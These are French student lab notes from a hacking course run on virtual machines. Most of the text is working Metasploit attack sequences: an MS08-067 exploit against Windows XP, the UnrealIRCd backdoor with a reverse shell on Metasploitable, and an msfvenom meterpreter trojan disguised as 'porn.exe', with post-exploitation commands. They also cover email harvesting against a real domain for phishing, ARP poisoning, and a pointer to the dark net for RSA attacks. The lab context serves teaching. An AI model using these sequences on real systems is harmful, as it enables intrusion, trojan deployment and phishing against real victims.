Vous êtes sur la page 1sur 3

TP 1

this practical is aimed on attacking a host so as to have access to his machine

sur kali linux en virtuelle: netmask : /28

- nano /etc/network/interfaces
- auto eth0
- iface eth0 inet static
- address 172.16.16.1
- broadcast 172.16.16.15
- netmask 255.255.255.240
- network 172.16.16.0
- /etc/init.d/networking restart && reboot
-vas sur les parametres de la machine virtuel et tu active le reseau comme un
reseau priv� sur kali et sur windows xp
POUR ACCEDER A UNE AUTRE MACHINE A DISTANCE ETANT DANS LE MEME RESEAU :
- ping sur l'hote et sur la deuxi�me machine
- command #msfconsole
- command msf> search netapi
- ensuite copier l'avant derniere ligne "exploit/windows/smb/ms08_067_netapi
- command use exploit/windows/smb/ms08_067_netapi
- command show payloads
- command set payload "windows/vncinject/reverse_tcp"
- command set rhost172.16.16.2
- command set lhost 172.16.16.1
- command run

sur windows xp en virtuelle:

- apres l'installation de windows xp configurer les reseau avec l'adresse de la


prochiane machine 172.16.16.2
- desactiver le pare-feu windows
- faire un ping sur l'adresse de l'hote et sur la premi�re machine

TP 2 :

1- Scanner un reseau local avec ipscan et zenmap

- installer ipscan qui permet de scanner les pc sur un reseau local


- sur kali linux : commande # dpkg -i ipscan.deb
- commande # ipscan
- ensuite l'interface de ipscan s'affiche et tu effectue un scan pour retrouver les
machines connect�s sur le reseau.
- zenmap est similaire a nmap mais affiche le reseau de maniere graphique et nmap
est en ligne de commande.zenmap permet de scanner le reseau local completement
- tu ecrit la cible ( son adresse et le masque de sous reseau) et au niveau du
profile est "intense scan"

2- Scan d'une machine distante

- ce tp on le fait directement en ligne. soit en ayant un point d'access ou une


connection sur un reseau locale
- quand tu vois .ovh sa veux dire que le serveur est heberg� chez un hebergeur hors
de la rti
- attaque par factorisation RSA permet d'attaquer un serveur lorsqu'il est
vulnerable ie la cl� n'est pas � jour.(aller dans le dark net pour apprendre cette
attaque et il faut installer "tor")
3- on utilise theharvester pour faire du "phishing"

- apres l'installation de theharvester


- taper la commande theharvester -d rti.ci -l 500 -b google

TP 3 :

1- comment cacher des informations dans une image?

- commande installer le paquet steghide dans kali linux


- commande apt-get install steghide
- commande steghide embed -cf image.jpeg -ef textesecret.txt
- commande steghide info image.jpeg
- commande steghide extract -sf image.jpeg
- commande steghide extract -sf image.jpeg -xf txt

2- man in the middle attack ARP Poisining

- ipscan
- route -n
- arping 192.168.8.1

TP 3 : 08/06/17 utilisant le pdf : UYI_SRI_06

- apres installation de metasploitable on configure le reseau du systeme


- nano /etc/network/interfaces
- auto eth0
- iface eth0 inet static
- address 172.17.17.2
- broadcast 172.17.17.127
- netmask 255.255.255.192
- network 172.16.16.0
- /etc/init.d/networking restart
- ifcong eth0

-- faire la meme chose pour les systemes( en virtuel ) kali : 172.17.17.1 ;


windows 7 : 172.17.17.10 ; win xp : 172.17.17.4
-- faire un ping sur les differentes machines virtuelles pour se rassurer qu'ils
sont en reseau
-- prendre le controle de metasploitable � partir de kali
-- sur kali taper la commande msfconsole
-- commande search irc (renvoie l'exploit qui va nous servir � atteindre notre but)
-- exploite une faille sur le irc
-- commande use exploit/unix/irc/unreal_ircd_3281_backdoor
-- commande show payloads
-- commande set payload cmd/unix/reverse
-- commande set rhost 172.17.17.2 (r pour remote)
-- commande lhost 172.17.17.1 (l pour local)
-- commande exploit
-- commande whoami
-- commande ifconfig
-- aller sur le navigateur de kali linux et taper l'@ ip de metasploitable
172.17.17.2
-- ensuite choisir phpMyadmin
-- sur le navigateur 172.17.17.2/multillidae selectionne OWASP (important)
TP 4 : 09/06/17 Creation d'un trojan horse

--sur kali taper msfvenom

TAF :
1. creer une payload

2.comment inserer ce payload dans un fichier,image ou une image dans le telephone

3.executer dans windows

4.lancer l'exploit avec msfconsole

5.meterpreter

-- msfvenom --platform windows -p windows/meterpreter/reverse_tcp lhost=172.17.17.1


lport=5050 EXITFUNC=thread -b '\x00' -f exe-only -o porn.exe (n'importe quel nom
avant le ".exe" ("Biblioth�ques\Images Capture_kali_1")
-- commande msfconsole
-- use exploit/multi/handler
-- set payload windows/meterpreter/reverse_tcp
-- show options
-- set lport 5050 pour modifier le numero du port
-- show options
-- set lhost 172.17.17.1 pour mettre @ip de l'h�te
-- show options
-- ensuite commande exploit
-- meterpreter help
-- pwd affiche ou tu te trouves
-- uictl disable mouse
-- show_mount
-- shell (pour acceder au l'arborescence de windows

Pour ouvrir le navigateur de windows (internet explorer )

-- c:
--dir
-- Program Files/Internet Explorer/
-- lance iexplore

Vous aimerez peut-être aussi